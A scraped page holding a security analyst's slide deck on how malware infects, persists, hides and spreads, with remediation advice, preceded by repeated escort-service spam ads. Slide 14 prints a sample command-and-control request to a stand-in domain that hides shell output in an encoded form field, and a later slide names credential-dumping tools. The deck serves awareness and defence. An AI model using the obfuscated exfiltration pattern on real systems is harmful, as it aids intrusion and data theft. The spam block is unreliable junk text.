Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...
Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...
 
Call Girls In Saket Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Saket Delhi 💯Call Us 🔝8264348440🔝Call Girls In Saket Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Saket Delhi 💯Call Us 🔝8264348440🔝
 
Networking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOGNetworking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOG
 
VIP Kolkata Call Girl Salt Lake 👉 8250192130 Available With Room
VIP Kolkata Call Girl Salt Lake 👉 8250192130 Available With RoomVIP Kolkata Call Girl Salt Lake 👉 8250192130 Available With Room
VIP Kolkata Call Girl Salt Lake 👉 8250192130 Available With Room
 
10.pdfMature Call girls in Dubai +971563133746 Dubai Call girls
10.pdfMature Call girls in Dubai +971563133746 Dubai Call girls10.pdfMature Call girls in Dubai +971563133746 Dubai Call girls
10.pdfMature Call girls in Dubai +971563133746 Dubai Call girls
 
How is AI changing journalism? (v. April 2024)
How is AI changing journalism? (v. April 2024)How is AI changing journalism? (v. April 2024)
How is AI changing journalism? (v. April 2024)
 
Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$
Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$
Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$
 
Chennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts serviceChennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts service
 
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
 
Rohini Sector 26 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
Rohini Sector 26 Call Girls Delhi 9999965857 @Sabina Saikh No AdvanceRohini Sector 26 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
Rohini Sector 26 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
 
Challengers I Told Ya ShirtChallengers I Told Ya Shirt
Challengers I Told Ya ShirtChallengers I Told Ya ShirtChallengers I Told Ya ShirtChallengers I Told Ya Shirt
Challengers I Told Ya ShirtChallengers I Told Ya Shirt
 

ECrime presentation - A few bits about malware

  • 1. A few bits about Malware A story about trojan horses and rats.
  • 2. $ whoami • Michael Hendrickx • Senior Security Analyst @ HelpAG • Vulnerability Assessments • Social Engineering • Presentations  • Created new undetected* RAT for the company • Belgian * Until now 
  • 3. Malware attacks: a real threat • Malware have caused a lot of damage • Many names: RAT’s, virus, Trojan, rootkit, ransomware, … • Examples: Cryptolocker, Zeus, BlackEnergy, … • Targets different platforms: • Browsers • Smartphones • PC’s
  • 4. Malware attacks: stages • Malware attacks comes in 2 stages Infection Exploited bugs, phishing, waterhole attacks, USB, unattended terminal, … Persistence AV evasion, persistence, looting, CNC connectivity, lateral movement “you’re in trouble”
  • 5. Malware attacks: infection • Stage 1: modes of Infection Exploited Software Bugs (Spear) phishing Waterhole attack Malicious USB
  • 6. Malware attacks: infection • Exploited software bugs • Attacker hacks into vulnerable service • Could be anything: • SQL injection on website leads to code execution • Poorly implemented upload functionality • Unpatched server software • Man in the Middle • Weak passwords • …
  • 7. Malware attacks: infection • Spear phishing • Very specific message to single or very few victims • Holds malicious payload • Macro, PDF, renamed files, trojaned archives, … • Or, links to malicious file: • Needs to be downloaded, won’t get caught by your AV.
  • 8. Malware attacks: infection • Waterhole attack • Indirect targeted attack • Attacker compromises sites that the victim probably visits. • Exploits outdated browser or plugins • Forces install of malware “your flash player is outdated” “you should update Java”
  • 9. Malware attacks: infection • Evil USB dongle • USB peripheral can be anything • USB hard drive / dongle • Keyboard, WIFI / network adapter, Microphone, … • Hub with any of the above • Example: USB rubber ducky • Looks like dongle, is a keyboard • Types 1000 words per minute • Is only 30 USD
  • 10. Malware attacks: stages • On to stage 2: Infection Exploited bugs, phishing, waterhole attacks, USB, unattended terminal, … Persistence AV evasion, persistence, looting, CNC connectivity, lateral movement
  • 11. Malware attacks: persistence • Stage 2: Persistence • Execution persistence • Ensure that our malware keeps on running • CnC Connectivity • Listen for commands • AV Evasion / Hiding • To prevent malware from being detected, removed • Lateral movement • Infect more machines
  • 12. Malware attacks: Execution persistence • Ensure malware keeps on running • Startup folder • Registry keys • Automatic Services • Browser plugins / helper objects • You’re re-infected whenever the browser is opened • Infected document templates • Every time a word/ppt/excel file is opened or created, you’re re-infected. Use Microsoft’s Autoruns to see what processes start upon startup. (https://technet.microsoft.com/en-us/sysinternals/bb963902.aspx)
  • 13. Malware attacks: CnC connectivity • Direct traffic • Probably (hopefully) detected and blocked • HTTP Tunnel • May get detected by L7 firewalls • “deep packet inspection”, pretty shallow • HTTPS • Difficult to see what’s happening, unless MITM. • DNS Tunneling • Usually gets “proxied” to target DNS server • Do you monitor anomalies? • Peer to peer WIFI network Hi, I’m an ad-hoc wifi network Up to 10 – 20 meters
  • 14. Malware attacks: hagrat CnC • Encode / Encrypt / Obfuscate traffic POST /css/cc.aspx HTTP/1.1 Accept: text/html;q=0.8,application/xml,*/* Accept-Language: en-gb;q=0.8,en Content-Type: application/x-www-form-urlencoded Cookie: ASPSESSION=laer8sp2miqisG0n2Ms1efjlj64; path=/ User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) Host: www.thisisafakedomain.com Content-Length: 277 Connection: Keep-Alive __VIEWSTATE=MTpNaWNyb3NvZnQgV2luZG93cyBbVmVyc2lvbiA2LjEuNzYwMV0NCkNvcHlyaWdodCAoYykgMjAwOSBNaWN yb3NvZnQgQ29ycG9yYXRpb24uICBBbGwgcmlnaHRzIHJlc2VydmVkLg0KDQpDOlxVc2Vyc1xoZW5kcmlja3hcb3duQ2xvdW Q+ZGlyIGM6Lw0KSW52YWxpZCBzd2l0Y2ggLSAiIi4NCg0KQzpcVXNlcnNcaGVuZHJpY2t4XG93bkNsb3VkPg;;. 1:Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:UsershendrickxownCloud>dir c:/ Invalid switch - "". C:UsershendrickxownCloud>
  • 15. Malware attacks: hiding • Hiding • Download multiple stages Dropper Malicious Payload (Real Virus)
  • 16. Malware attacks: hiding • Multi stage download ensures correct victim Malicious Payload (Real Virus)Can I reach the Internet? Dropper Innocent Payload This is not the IP / Company / country I’m targeting Cool, I’ll install it Bingo!
  • 17. Malware attacks: lateral movement • Exfiltration of information • Documents (%userprofile%documents) • Passwords (mimikatz, Lazagne) • Browser history • Emails, files, … • Recon / Infect the network • Ping other machines • File shares • (Sharepoint) portals
  • 18. Remediation • Human factor: don’t get infected • Social Engineering exercises • Awareness • Alerting IT security (“Support, I think I did something wrong”) • Technical factor: prevent, detect, destroy • Tight controls on end points • Monitor inbound programs (attachments, downloads, …) • Monitor network usage • DNS Anomalies, unidentified protocols, … • Regular scanning with AV, IOC detectors, … • Such as Loki: (https://github.com/Neo23x0/Loki)
  • 19. Thank you! Questions? Don’t accept any USB dongles from me! 
  • 20. CONTACT US | WWW.HELPAG.COM | INFO@HELPAG.COM DUBAI, UAE ARJAAN OFFICE TOWER, OFFICE 1201 / 1208, PO BOX 500741 T +971 4 440 5666 F +971 4 363 6742 ABU DHABI, UAE SALAM HQ BLDG, BLOCK 6, EAST 1-16, OFFICE 503, PO BOX 37195 T +971 2 644 3398 F +971 2 639 1155 DOHA, QATAR AL DAFNA – PALM TOWER OFFICE 4803, WEST BAY, P.O. BOX 31316 T +974 4432 8067 F +974 4432 8069